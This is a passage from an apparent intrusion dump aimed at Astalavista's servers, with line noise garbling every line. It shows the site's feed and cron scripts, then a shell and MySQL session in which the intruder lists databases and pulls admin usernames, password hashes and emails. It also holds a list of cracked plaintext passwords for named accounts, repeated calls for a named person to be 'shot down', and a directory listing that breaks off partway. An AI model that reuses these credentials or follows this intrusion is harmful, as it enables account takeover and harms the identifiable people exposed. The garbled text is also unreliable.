t" z: t7 e; l$ g; l <link>http://www.astalavista.com/exploits</link>
" ^6 I* [4 e6 \" p' _- w8 K <description>All availably Exploits.</description>0 v6 J% H0 N+ `
<language>en-us</language>0 ]7 t& F9 A; P2 c2 l' q5 @' `, @9 U
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>& e# n# V1 b8 j! w! n9 j9 A
<docs>http://blogs.law.harvard.edu/tech/rss</docs>( s- |* p6 E* ]! D# O, L `
<generator>Astalavista.com</generator>: s8 R2 m7 L! v( A' }% c3 V
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
) U# y8 P9 c1 K1 | l# U) S' t </channel>9 M- n9 A' t! h
</rss>’;, A4 P4 w6 t. R3 p
' ?# k7 e4 o; N# D2 I
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
* l' x1 f) A" b$ e% Z unlink (FULLPATH . ‘/feed/exploits.xml’);
* q) i* e- F6 w* J6 c# G6 R }2 s+ t$ h( m, j) S3 ~- l7 H( e
8 L& x1 C1 P) n+ c: n/ p+ W0 l0 p file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
: u7 W7 R, m' F' f1 S) @5 A" N! k[snip]
$ _5 [1 l& B) C- o& Q. E% m$ W+ D$ F, ~* y
sh-3.2$ cat exploits.sh% @6 Y7 b0 i& H4 e L1 Z u& ]
#!/bin/sh
" ^6 X7 e% Z, P* ]% ^
; H- ~$ y% m+ i###########################################################
6 a1 h' D8 M4 C3 z( y+ ]+ I# #
% L# B/ e, B3 t" P2 |6 J* v: A6 N# Title: milw0rm exploits adder #: Y4 U# g1 H; ~) a* r% Y( b6 i
# Description: Add all milw0rm exploits to the #! g: h9 O7 P+ d( z U7 l6 _- [
# Astalavista.com database #' c9 w4 B% ~2 H$ b1 J7 t2 P3 u: Z
# #0 s$ |& Z' o* S
# Company: Astalavista Group #+ M5 d6 w0 C* P1 K4 {/ f# R9 ^
# Author: Paulo M. Santos #% _, c( b6 I& \( X+ v) ^3 Z
# E-Mail: 链接标记paulo.santos@astalavista.ch #
0 @" E% w, \( J$ e# #% A3 d& K& W1 {# b# k
###########################################################0 X6 S* n4 i) @; ]
/ r& w0 S* v: x& _# path
" @ P u( u2 |3 R7 }$ A! |this_path=/home/com/public_html/modifications/cronjobs
" h4 F& K/ X4 z& z! O/ d) z
: u9 O) u) J! t1 E) _- B8 j# change directory
6 ]" x. M2 p. {0 h9 M2 tcd $this_path
3 ^2 |4 h3 @2 g A! Acd tmp/
$ k8 o" |1 |0 ^+ g1 H% e7 [3 H- p; a1 W! @. F0 d# T r
# delete files# @! F/ |2 ?- Q8 b ^1 H; a
rm -rf milw0rm.tar.* &
+ h( H6 J; P% C3 c# I* q: R. k' w. Lrm -rf milw0rm/ &
; v* @9 S7 y6 I; u: E
/ e+ I. d, a/ W, {# wget milw0rm paket" H: ~# H9 r4 v' B1 y* Q7 o) v
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]' ?/ K7 M) k7 q9 o/ x Q
( i2 d+ s' G5 n, H3 s# extract milw0rm paket6 P1 [, i/ a0 H5 @
tar -xvf milw0rm.tar.bz2% G. r, ^& s) B8 z ^
2 S! H8 Z, W& w* B
# change owner! f2 F# p3 K7 v5 N! a! b
chown -R com .
/ p0 k3 r# E! p. \/ J+ Hchgrp -R com .
9 p% A) a T+ D" h1 _ z# F0 j% j& q5 u
# execute php script
2 ^5 p9 \+ s3 K4 Mcd $this_path w- |( b" z1 c! ^
php -q exploits.php
6 u4 y4 e& S( |9 v- A. T( [7 T# n6 I. x4 h; b- y1 R
# delete files
/ k4 y0 x1 J# O2 X/ }rm -rf tmp/milw0rm.tar.*1 z0 X8 d8 ]3 K5 x& k
rm -rf tmp/milw0rm/3 `: J! E: d, { @$ j* y
& B7 Z6 k w% ?: h" d2 Ash-3.2$ echo “Paulo M. Santos needs to be shot down.”0 a* Z8 v2 u+ Z9 W
Paulo M. Santos needs to be shot down.0 a" T; R* `! ]4 I6 U, M* ?
) f" V' `+ [( f
mysql -u contrexxuser2 -p
- r7 g/ F3 l. }- G0 K4 JEnter password:
& |+ r# o: f9 l; }0 HWelcome to the MySQL monitor. Commands end with ; or \g.2 `& D1 S& t! [8 o( s7 m
Your MySQL connection id is 261694) N: |; E" r0 e: {- e
Server version: 5.0.45-community-log MySQL Community Edition (GPL)0 @9 x( y" A+ z. Q
0 u0 u: @# y* r" \
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.& m" y* y$ ^7 O
) T0 }4 @+ }' q( u4 I: |mysql> show databases;7 N$ `2 Y1 b6 {3 M: a; V) x# T% g
+——————–+2 @* i2 x* t% J' c' \* U+ g
| Database |
2 D. u( M( k8 \0 T- Z+——————–+
* w2 Z" A* z1 p1 J7 R1 M| information_schema |
1 G7 j3 O5 U a$ |$ e2 D& P| com_contrexx2 |( d1 E# {% C0 ]; W
| com_contrexx2_live |3 t1 M6 j5 L9 b1 E: z5 U, {' X
| test |
9 |8 |* L" X' V: H7 l, U+——————–+
7 @$ k0 D0 u! M8 X4 rows in set (0.00 sec)
' k- `( F2 j. P9 h" n0 k6 p$ Y/ \8 Z1 b+ S5 Q1 E# ]; E4 Q
mysql> use com_contrexx2_live
5 L5 ~2 }! \5 ^+ IDatabase changed/ J1 R" `1 i/ |
mysql> show tables;4 |0 b# F. \7 A
+————————————————–+
! \4 }, I- `. u% a| Tables_in_com_contrexx2_live |1 O& C! Y! t; f- G) O! m# k
+————————————————–+
% i8 `: C4 |1 H8 T* t% U+ M z| cc_banner_counter |1 a7 e# k0 l/ \' l% x- V
| cc_search_counter |
, W4 J" t- q6 V: D& I# q2 Y| contrexx_access_group_dynamic_ids |* z/ Z. R' X' x0 |8 r
| contrexx_access_group_static_ids |4 D+ A6 o0 ~6 e; q2 _7 Q
| contrexx_access_rel_user_group |7 a* u; k: q! _3 d
| contrexx_access_settings |+ |; M6 E5 Q( s6 u$ h; G
| contrexx_access_user_attribute |
) m. z6 K, c" S| contrexx_access_user_attribute_name |6 `% S& y& i6 |; c! O
| contrexx_access_user_attribute_value |
5 n: c+ j- I" Q2 K, `4 ^( t/ e| contrexx_access_user_core_attribute |1 |* H) D _3 O) _- b
| contrexx_access_user_groups |
7 d' `4 T& z" c0 k% }6 q| contrexx_access_user_mail |3 F, }* M4 k7 ^6 {0 C, Z
| contrexx_access_user_profile |
8 ^3 ?( E6 @, b! Q| contrexx_access_user_title |7 \& d. p# n; f" Y; J5 k9 M. L
| contrexx_access_user_validity |5 ~9 I1 f1 F& E s
| contrexx_access_users |
: m8 C* z0 l0 _1 S1 z, u# N9 }| contrexx_backend_areas |
$ ]- \. m* G# p `' e8 Q& h G| contrexx_backups |5 o- s& U+ W/ @' c0 C& F a% n
| contrexx_content |+ X2 |& o s5 {! X
| contrexx_content_history |. q. w0 @) N( \5 U
| contrexx_content_logfile |
1 c! i8 D2 k! Q i& X3 l| contrexx_content_navigation |, d9 m& V0 F' s+ [; C: k) q
| contrexx_content_navigation_history |
4 r- j1 w, n0 t0 J/ ?| contrexx_ids |
9 s' Z' d4 z1 @3 I3 f* R| contrexx_languages |0 }5 @+ m0 J) }& X. }' d% n# \0 }
| contrexx_lib_country |/ L" u$ I7 t0 t/ I/ p" J
| contrexx_log |
9 O: k4 }# z& d' c9 X. L| contrexx_module_alias_source |7 u8 [7 Y) m: A4 n* c+ `
| contrexx_module_alias_target |
' a* \* Q3 \$ J5 v' h| contrexx_module_block_blocks |
; ~& G! _7 d. n# r5 p| contrexx_module_block_rel_lang |
) Y/ w, T9 ^5 W1 _| contrexx_module_block_rel_pages | V! m& F" {" |' w: L5 Q6 q
| contrexx_module_block_settings |
- g. }0 k0 ~& w6 x9 w9 n' h6 R0 G9 N% a9 O| contrexx_module_blog_categories |
5 G9 _- F2 T9 Q I2 [| contrexx_module_blog_comments |1 Y3 A, W2 P" x0 Z) I3 w9 ]
| contrexx_module_blog_message_to_category |7 @& v& \) x$ @* _$ Z+ P
| contrexx_module_blog_messages |; u9 A" R6 A) v6 L! n
| contrexx_module_blog_messages_lang |( J( z! g' @, C$ h
| contrexx_module_blog_networks |
, s. ?7 @ t, b; H8 O7 S| contrexx_module_blog_networks_lang |: x; Q1 D/ N2 N E3 V! ~
| contrexx_module_blog_settings |
; i; m8 r8 g! x3 I$ Y| contrexx_module_blog_votes |
9 z" J! s; S0 Q; A0 ]% Q& K| contrexx_module_calendar |
. f/ \7 k" P5 e, C. Q5 h" v. Q1 J: L| contrexx_module_calendar_access |& F7 ^- D/ p0 Q( {2 C0 W0 {* b
| contrexx_module_calendar_categories |
* b+ `" Y' @. j P| contrexx_module_calendar_form_data |$ A7 a0 O& \# Z9 w4 l
| contrexx_module_calendar_form_fields |
/ I7 }; M$ E7 a| contrexx_module_calendar_registrations |; N- M/ M' I! E4 [
| contrexx_module_calendar_settings |3 [ ~5 `8 j' Z7 k
| contrexx_module_calendar_style |3 C* o& g& a5 X+ |- b
| contrexx_module_contact_form |" B U4 I& S' X9 C& Y. ?. d! A
| contrexx_module_contact_form_data |
. g% i- [7 [2 o6 K, X| contrexx_module_contact_form_field |
; x" N$ b* j& c* D1 s- @" G| contrexx_module_contact_settings |7 v! I0 a. h) |$ J
| contrexx_module_data_categories |
+ P2 |; T7 s1 |( \! n- K9 V, S; }0 s| contrexx_module_data_message_to_category |5 X$ W! i- A+ |4 q% E. c
| contrexx_module_data_messages |' o$ L- z0 b* Q/ q+ v
| contrexx_module_data_messages_lang |& i5 f8 Y( i' D( |1 |4 C
| contrexx_module_data_placeholders |
7 l* u. B6 ~7 Q) K7 Z| contrexx_module_data_settings |
3 n+ m, h( J5 }3 N+ o| contrexx_module_directory_access |
- r2 K& m1 B" a, L1 s0 }| contrexx_module_directory_categories |
9 @' N6 j8 T2 R4 A5 `7 i| contrexx_module_directory_dir |
- R9 O! G. N4 K, E( _: x| contrexx_module_directory_inputfields |( w. \2 i& s3 \
| contrexx_module_directory_levels | n b. G+ k( |0 {7 [( w
| contrexx_module_directory_mail |8 {- U" }( N9 U. L# e+ U
| contrexx_module_directory_rel_dir_cat |
! j2 a4 s' f6 W# z| contrexx_module_directory_rel_dir_level |' J5 I, Y6 k) t5 G! a& C
| contrexx_module_directory_settings |% z( o; c: I7 r' z, T% S; [: u. o' O4 Z
| contrexx_module_directory_settings_google |
7 o0 s! b9 t3 h* {; N' A6 ^| contrexx_module_directory_vote |
, B" y# l4 G7 D1 F4 `; a4 t| contrexx_module_docsys |
/ L2 b) u/ T' T/ G. O K9 x4 S| contrexx_module_docsys_categories |" `* W0 ^% p- B4 W& {' P* C
| contrexx_module_egov_configuration |
, o$ E' g6 K5 D| contrexx_module_egov_orders |
% W6 X/ m" } n& p% b- }; {| contrexx_module_egov_product_calendar |
! D2 c7 w& w4 ?" C8 B; m6 c; }| contrexx_module_egov_product_fields |+ m6 o4 z# r4 n5 d( ]
| contrexx_module_egov_products |9 x- `4 |3 y$ I3 ?! o
| contrexx_module_egov_settings |
/ e2 t' E* R: Y1 a* P| contrexx_module_exploits |
7 Y/ d6 N3 r f| contrexx_module_exploits_categories |6 D# I* _8 D7 v( {: u# `
| contrexx_module_feed_category |
& Q' R- _4 \: s3 {% n| contrexx_module_feed_news |
" ]. n- o1 a1 ~4 l/ X| contrexx_module_feed_newsml_association |% F/ b- U/ }& t8 B
| contrexx_module_feed_newsml_categories |: q; D" S' g: F6 I' p) `2 v' x
| contrexx_module_feed_newsml_documents |1 e0 [9 C1 p( j' B Z+ k
| contrexx_module_feed_newsml_providers |
5 M- z$ R4 b' R3 t" x| contrexx_module_forum_access |- `; b! X4 Q7 y- }, e7 h9 y9 d, B# @
| contrexx_module_forum_categories |
. t! G* p5 Y7 o9 x| contrexx_module_forum_categories_lang |
^- h. v: j) w* M; L| contrexx_module_forum_notification |# \/ A2 e% o) o7 s. [
| contrexx_module_forum_postings |# C8 N+ n( E0 N5 T0 u! L3 P
| contrexx_module_forum_rating |8 ? ^, ^ q7 R3 N; K( u' N0 q7 e& {
| contrexx_module_forum_settings |
) z" i7 x0 O; a1 \& || contrexx_module_forum_statistics |5 b- s& e& q2 l! a$ ?" }/ }
| contrexx_module_gallery_categories |
# e+ {! o' L. i2 {& r| contrexx_module_gallery_comments |
% A8 v: o6 }9 X# e k1 w9 m& L| contrexx_module_gallery_language |1 \$ E! E H' ^$ J! X0 m. z3 ?
| contrexx_module_gallery_language_pics |3 v' i" Q& ]1 T7 U y( ^+ h& S
| contrexx_module_gallery_pictures |
" s! ?# a& ?3 n+ [| contrexx_module_gallery_settings |
# q! @$ A* @5 T5 h6 r/ d, _| contrexx_module_gallery_votes |0 k, n% i! K9 I' P! r) j. ]) o
| contrexx_module_guestbook |3 E0 \+ ?, x7 e$ ?9 [
| contrexx_module_guestbook_settings |
/ }' F7 y) O6 ]( k, c# T| contrexx_module_livecam |
6 Y8 ~: }, ` t: m! v# s| contrexx_module_livecam_settings |/ l& u1 H8 V1 M; D1 t
| contrexx_module_market |
9 |4 M% ?& x$ N/ W2 F9 G6 U: y| contrexx_module_market_access |4 X i) Q( b0 ~! W
| contrexx_module_market_categories |
+ }0 S% V3 \& T, q+ \| contrexx_module_market_mail |
( Y8 |; t% v$ G9 p* j| contrexx_module_market_paypal | w# e2 D) E. _ i
| contrexx_module_market_settings |
9 a, B4 ~- \9 M0 S% E- P| contrexx_module_market_spez_fields |) O7 u& o: Y2 @8 H6 l: U1 }8 ~
| contrexx_module_mediadir_access |
4 x% F+ p' t& r; {" N| contrexx_module_mediadir_categories |
. D' o0 y8 C; c/ @" w! x$ i. Y; `& Y| contrexx_module_mediadir_comments |2 x/ g; b# I: w7 H' _" n2 q- r
| contrexx_module_mediadir_dir |
' t) T& w1 w5 Z( k| contrexx_module_mediadir_inputfields |
! p. u2 l3 w/ i/ l) ~5 k| contrexx_module_mediadir_levels |
9 B9 `5 V8 |1 O2 O7 ?* B; L| contrexx_module_mediadir_mail |: I1 R8 ?$ l8 D$ G% Z7 s! D
| contrexx_module_mediadir_rel_dir_cat |
* K. N5 E7 f$ A k| contrexx_module_mediadir_rel_dir_level |
: U3 L6 ` ^( o& R| contrexx_module_mediadir_reports |
6 h5 r2 o4 a t| contrexx_module_mediadir_settings |
: `& [3 ~5 p1 z$ l1 r: @| contrexx_module_mediadir_settings_google |5 v+ X/ e/ d; ]& E- v0 u
| contrexx_module_mediadir_vote |' n/ V* T1 _; p) S( X% k$ f
| contrexx_module_memberdir_directories |3 r+ \7 L1 T% T& W0 z
| contrexx_module_memberdir_name |
* N$ X% V c% E5 b| contrexx_module_memberdir_settings |
3 d; b+ K! W5 |4 k( h% l3 a1 E2 O0 z, B; R| contrexx_module_memberdir_values |% h/ c4 C5 t- F# J. c O
| contrexx_module_nettools_allowed_groups |
8 \; d) n$ A' E" {| contrexx_module_nettools_settings |
1 c; i4 U8 w! o. u| contrexx_module_news |
8 f! ]& e9 }* m| contrexx_module_news_access |
# W9 p- s, u( D) z| contrexx_module_news_categories |
* r! ?+ I+ h" u" L! [7 Q# N| contrexx_module_news_settings |
p- H+ u$ i0 N| contrexx_module_news_teaser_frame |/ }) @3 e4 }3 p/ d% }# z: m9 I- o
| contrexx_module_news_teaser_frame_templates |) g1 N1 q% `0 p% U# D! M0 d
| contrexx_module_news_ticker |2 M; n( P( F h& b6 z
| contrexx_module_newsletter |
$ m; z1 z3 y! ~| contrexx_module_newsletter_attachment |, B V( t" m5 j, d
| contrexx_module_newsletter_category |! p( y2 z# P5 T! s4 }
| contrexx_module_newsletter_confirm_mail |- V* k2 F% w- R" s1 a: y" Y
| contrexx_module_newsletter_rel_cat_news |) H0 v( M" i* D0 s' G+ |4 n) F
| contrexx_module_newsletter_rel_user_cat |
2 U$ n' {, X( X7 h" D K| contrexx_module_newsletter_settings |6 |- E$ @/ m$ n! p
| contrexx_module_newsletter_template |
, i, ]! H% K- q% t5 V9 ~; Y| contrexx_module_newsletter_tmp_sending |8 z* Z6 z1 \! U$ M7 C$ w
| contrexx_module_newsletter_user |' l+ i7 Z! S1 L* v
| contrexx_module_newsletter_user_title |# E+ W& l4 d# O
| contrexx_module_onlinetools_defaultports |
& S/ ?/ {, e" @4 B1 D6 j* k| contrexx_module_onlinetools_defaultports_back |6 j" L0 Q6 [0 _
| contrexx_module_onlinetools_geolitecity_blocks |2 |3 m- j: i" M3 W
| contrexx_module_onlinetools_geolitecity_country |
% ` w" b, P* a1 y: D| contrexx_module_onlinetools_geolitecity_location |
( E6 }' f$ z( _) J4 `; o| contrexx_module_podcast_category |
5 D1 J# t; e& O/ t7 E| contrexx_module_podcast_medium |# S) G! X. h8 l; ~1 x
| contrexx_module_podcast_rel_category_lang |! ?, F9 Y% A$ N6 d w0 m+ e b
| contrexx_module_podcast_rel_medium_category |
' c( W6 G& K7 e# E9 \' Q| contrexx_module_podcast_settings |
8 C/ [$ [! m) P" s5 d/ P0 L& i| contrexx_module_podcast_template |
$ Z! b( ]. K. B) n0 W' w7 v+ I+ s| contrexx_module_proxydb |8 t% ?& P) g' ]) i9 D/ P3 l
| contrexx_module_recommend |( f$ }4 S* a; g' E
| contrexx_module_repository |3 n3 {" g, b. E9 w; B
| contrexx_module_securitynews_cats |# E6 A3 `- P# H. b8 u; l. {
| contrexx_module_securitynews_feeds |' K! @/ C: p9 b- J& }
| contrexx_module_securitynews_news |, ^5 R6 t# @ b( W
| contrexx_module_shop_categories |- S: z) B9 m/ o6 m
| contrexx_module_shop_config |
/ d' R+ ~) I- U| contrexx_module_shop_countries |
$ z8 C" p9 j: Y| contrexx_module_shop_currencies |3 h7 K3 W, {* F1 e0 P7 m- B$ f
| contrexx_module_shop_customers |4 p, y+ ]2 k9 O/ a# t- `4 i
| contrexx_module_shop_importimg |
: N$ R* w. p+ h7 `8 M| contrexx_module_shop_lsv |
5 R5 Q/ \7 K/ F# M" Z e$ i| contrexx_module_shop_mail |
4 q1 {2 a- U. U& O' _: V$ f| contrexx_module_shop_mail_content |4 q {7 B1 v) Y7 R/ i
| contrexx_module_shop_manufacturer |
% w9 @1 ]: Z3 Y7 X2 p/ J| contrexx_module_shop_order_items |2 [- M2 _/ g( B9 O
| contrexx_module_shop_order_items_attributes |7 A2 o; E2 l k$ p! R& [) e% u; n
| contrexx_module_shop_orders |) B3 a% e" w' H# X# H$ a! w
| contrexx_module_shop_payment |
. A, G, S: H% h) r| contrexx_module_shop_payment_processors |
6 _& K: W' F2 k, _ l1 L| contrexx_module_shop_pricelists |& L% t) t1 G! a' h
| contrexx_module_shop_products |
5 r8 p+ v5 h0 X- O3 u/ e# I, V7 t" Y( y| contrexx_module_shop_products_attributes |
5 V8 {/ O& y+ w" K| contrexx_module_shop_products_attributes_name |/ L$ M$ A# \# K3 c/ S
| contrexx_module_shop_products_attributes_value |1 ]2 @/ F9 D& I
| contrexx_module_shop_products_downloads |
0 `1 n1 _5 L3 I' {| contrexx_module_shop_rel_countries |2 o$ ^. i$ L; n1 r+ O; B. {
| contrexx_module_shop_rel_payment |* T; A! H2 Y2 a2 A
| contrexx_module_shop_rel_shipment |
7 U. Z" F) I0 B& n| contrexx_module_shop_shipment_cost |
0 _, P# H3 ~1 H" n, z3 O$ s| contrexx_module_shop_shipper |4 Y6 i; ]& L7 [$ }7 I
| contrexx_module_shop_vat |
- Z- c! a" P, L/ y. u( ?| contrexx_module_shop_zones |* M4 Z# n1 y7 `6 W* [
| contrexx_module_u2u_address_list |
) K) I# n' N" G1 d9 c* A# t: W| contrexx_module_u2u_message_log |
# ?+ F/ }4 |3 i: l| contrexx_module_u2u_sent_messages |
& t7 w' F* ]/ a( n| contrexx_module_u2u_settings |
: Q7 M5 ?3 }! E: y6 J$ p4 ^! y| contrexx_module_u2u_user_log |
- [* M3 p0 H0 C6 C) |2 ]| contrexx_modules |, e1 s9 T5 U8 B2 ~; a8 ~
| contrexx_sessions |3 U2 |! U5 x& ?& D+ x; G' J% P
| contrexx_settings |
! v1 f7 r& i$ J1 T8 `# r| contrexx_settings_smtp |
* A. w$ K- d0 P" d+ d7 z| contrexx_skins |4 I7 g; e" B# y- ^$ M/ I( D
| contrexx_stats_browser |: H3 X9 s7 R, a! l% K
| contrexx_stats_colourdepth |
8 {1 }: ?" s9 a$ d| contrexx_stats_config |# t8 |8 H' u1 Y
| contrexx_stats_country |
. k2 E1 i1 V- [| contrexx_stats_hostname |0 b' P" m" U7 I% ~8 t- R
| contrexx_stats_javascript |
7 X! v8 I8 Y) S( {& y Z9 }| contrexx_stats_operatingsystem |
4 u. h6 X+ V( z| contrexx_stats_referer |
. l# ?3 r" c) \3 I% |$ |8 i9 b| contrexx_stats_requests |
8 T5 i& ~: l- ^" q. ^0 M3 G| contrexx_stats_requests_summary |* z c7 i! E$ q6 h$ U- _( W; n4 r
| contrexx_stats_screenresolution |7 b$ S3 Z3 M2 z% e( f1 K
| contrexx_stats_search |
m! ~5 y4 u. N) T: }* u| contrexx_stats_spiders | `' w8 v# i: f( Z+ E! D2 r, T2 A
| contrexx_stats_spiders_summary |; R- F' L8 E" m/ [4 q$ E( B
| contrexx_stats_visitors |
5 X$ \0 ]9 M! S) r& C| contrexx_stats_visitors_summary |' ~/ k( R$ s& w& @" A* T% ]6 u
| contrexx_voting_additionaldata |
+ M7 v+ d( }" B% T8 O! ^. |/ @, l| contrexx_voting_email |
. s; ~! R& Q* L; `5 w, G! C( \| contrexx_voting_rel_email_system |
' _: y: q" e+ r/ ]| contrexx_voting_results |
% Y% M9 }7 n& ^| contrexx_voting_system |
, z7 o2 g2 i" \# z1 O' x| foo |
0 p' G2 F D u+————————————————–+! y# `) q+ {$ Y% p0 n& o
227 rows in set (0.01 sec)
& g2 \* R; Z( D& ^: i+ F* U' b- g$ n7 R6 ~6 G B: `( o
mysql> select count(*) as skids from contrexx_access_users;. j' M6 W$ m3 ?! l. ]
+——-+$ g) S2 }3 \( f& b8 v( Y8 r
| skids |& L- y' s' E7 a1 Z
+——-+
- Z0 |9 C; ~" T5 I| 53699 |* T- u h4 o% D* d; l" M! g. B
+——-+
2 |% S* M% t4 V* `3 D1 row in set (0.00 sec)
( @4 |4 N" P7 t" M7 \5 w
) U7 S- C( R: K( w$ vmysql> describe contrexx_access_users;/ W- q! i$ j9 g) l5 Z7 s* J
+——————+——————————————+——+—–+————–+—————-+- r/ k( w2 F$ z5 ?& y
| Field | Type | Null | Key | Default | Extra |7 P# T/ Y+ q( o: ]) q; `" V
+——————+——————————————+——+—–+————–+—————-+" J( u6 C* L0 q9 M, H8 V# D
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |# T5 l$ W- M$ z; @; f% b1 k5 L
| is_admin | tinyint(1) unsigned | NO | | 0 | |
# {$ T o/ s/ I% Q| username | varchar(40) | YES | MUL | NULL | |
2 D: A! y. a$ b. E, F| password | varchar(32) | YES | | NULL | |; ` i& U' k L6 ]" ~. O
| regdate | int(14) unsigned | NO | | 0 | |" `, U8 d/ t; G' w `: e
| expiration | int(14) unsigned | NO | | 0 | |9 A. H: g1 g# T m7 _
| validity | int(10) unsigned | NO | | 0 | |
# ` r; v& M$ T, p6 T C| last_auth | int(14) unsigned | NO | | 0 | |
, S7 @' k% w) ]2 l% q| last_activity | int(14) unsigned | NO | | 0 | |6 Y# ~/ H& F& }% a0 V( X
| email | varchar(255) | YES | | NULL | |: s/ m4 J, ]0 o& }5 E
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |# G6 i6 z( Y" L1 W
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
2 O) E/ ^2 \ g, X1 {$ F _| backend_lang_id | int(2) unsigned | NO | | 0 | |
" Z O" F |0 _| active | tinyint(1) | NO | | 0 | |# N7 Z0 ~/ z' `5 z/ a1 r
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
5 B( d0 i# j) E) | ]2 Q| restore_key | varchar(32) | NO | | | |
& S7 j1 U, m8 j( c| restore_key_time | int(14) unsigned | NO | | 0 | |
# Y! @, s* G! M, R, t% q7 v| u2u_active | enum(’0′,’1′) | NO | | 1 | |1 X a! U" O' e$ \2 ~
+——————+——————————————+——+—–+————–+—————-+
( @7 |9 t q4 f& {3 o2 g8 B18 rows in set (0.00 sec)1 x1 k/ s3 f' w9 X* M
4 H$ \' q) {: `
mysql> select username,password,email from contrexx_access_users where is_admin = 1;; U0 i, [* Z+ T& N# K: @$ ~
+————+———————————-+—————————–+
3 Y) \0 U8 [0 H4 |7 G4 Y| username | password | email |4 s; B* J( k- ]$ ?% b
+————+———————————-+—————————–+
0 K9 N% F t8 x6 W3 x+ Y$ q6 M. ?| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |) p5 D7 C6 v- |; D- \7 W, T- g
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |: I1 t _; |9 b* W2 B: N) F
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
6 ?! M1 R1 }- Z* E. |9 q6 ^1 W| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
( L) G' g% M) r8 F+————+———————————-+—————————–+
' ^# D' |' @2 g4 rows in set (0.04 sec)
7 s3 t' r. q/ Q! F! V7 {' [( Q" l3 N5 |" \
mysql> exit;2 p! l$ s8 P K. E
Bye" _2 J- ?( H( r, K3 @1 p
6 _* |1 h$ s; F9 L[~] There you go, your “team of security and IT professionals” is a joke.) Q$ O; U5 Y! M) Z
/ g. Y; H! h( W& o3 d. m+——————————+, d- S! }7 r# e9 Y0 f# U- ?
system:f82BN3+_*
6 d& K8 H( y# P7 [Be1er0ph0r:belerophor4astacom; {5 d- c+ h. M1 G, h" j
prozac:asta4cms!
: `4 r/ [; T% X% @commander:mpbdaagf6m
1 U' p0 U# N K$ ksykadul:ak29eral
, Q5 ?+ _( v9 j: A" |. n$ q! m+——————————+# m: c: Z7 W y( m' h
& o b: d8 w5 Z. b3 _[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
$ t$ K! Y% y4 W3 P+ s…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.5 n; y W) k% d6 r- h) r1 H
- A# r `& O' V* N. o" {; n[~] Lets move to astalavista.net now,
+ x; K% e) t" t" U2 d' I' Z7 j+ L3 k7 Q/ I0 V' ^+ D
From <链接标记[url]https://www.astalavista.net/[/url]>:
4 v7 x! A3 S. E1 }5 o3 k>> Everyone knows that the best defense is a good offense.
3 c9 n% s, {# y e" K0 y>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.; h' z# m+ U; T9 l( {
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.3 w9 M; P8 i4 s
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”) Q- u* S p+ g# Y' ~
" E1 h! n- O. q$ d2 w/ j
>> Go ahead, try and hack our server . in a completely legal way!3 R0 t: N9 `9 |+ G8 J
>> Learn by doing: We offer our members tricky tasks and challenges on an
0 Q: y: y8 w) E>> ongoing basis so you can test your knowledge and abilities. You can also
# ?' L! B5 m2 p) W* ]4 C>> demonstrate what you.ve mastered by taking part in regular hacker contests( i3 _$ {0 o( x8 V8 ^+ Z
>> and war games
* h$ h4 [# [2 {1 F( l' V; c/ I+ L* i8 @
0 X* H' C# [+ a9 G4 i4 a[~] Lets take a look there, after all… they are hack-proof, aren’t they?!) a) g% e; i- c( `1 h. M. P
8 k! K# }$ O# a$ x) R" K9 o. U8 `[-] Tricky task: Find home dir of astalavista.net
5 P8 d- m; I0 J' v1 {& L% I% @0 }0 l$ S
' D4 n' E4 N+ t9 u. z' `sh-3.2$ ls -la ~astanet
0 F( V9 T( G# k! V8 Gtotal 481 o( @2 R9 Y$ E3 s4 Y8 _* W/ o
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .8 E& k$ F, g0 \$ \+ x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..- x; x6 f9 }. ?+ H
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! J: m* a' l! `6 l-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history. u. l. \3 H- I! |0 J2 u ?! z
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
" W( H* ]; y6 n5 h) s; R* r+ c-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile- _: A% e. b7 U6 i% J
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc4 f7 u2 d j4 J7 g3 X1 _; Y
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
$ E; J* r- s+ a6 E+ K! p [/ Qdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ s- s/ N& i( k+ P+ R/ ~5 o2 D; k1 e T
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
, V0 B& Q$ Z; S7 k9 B8 Ilrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
$ n' j! p# F+ ~) Q) ~! ^! A. S-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
- `5 j/ z7 v8 }+ c, K, G
( O! V2 e! ]' x2 }( W3 w4 [: Ksh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/) s" R1 h( t0 F; e1 [% Z7 y
sh-3.2$ ls -la
6 k) a6 U7 g o6 rtotal 200
4 o$ h. s- z2 _4 P5 `drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
, E5 P7 K% ?$ x+ p% ^) U$ d4 Wdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..6 G8 m) L% o* a7 C4 S% F
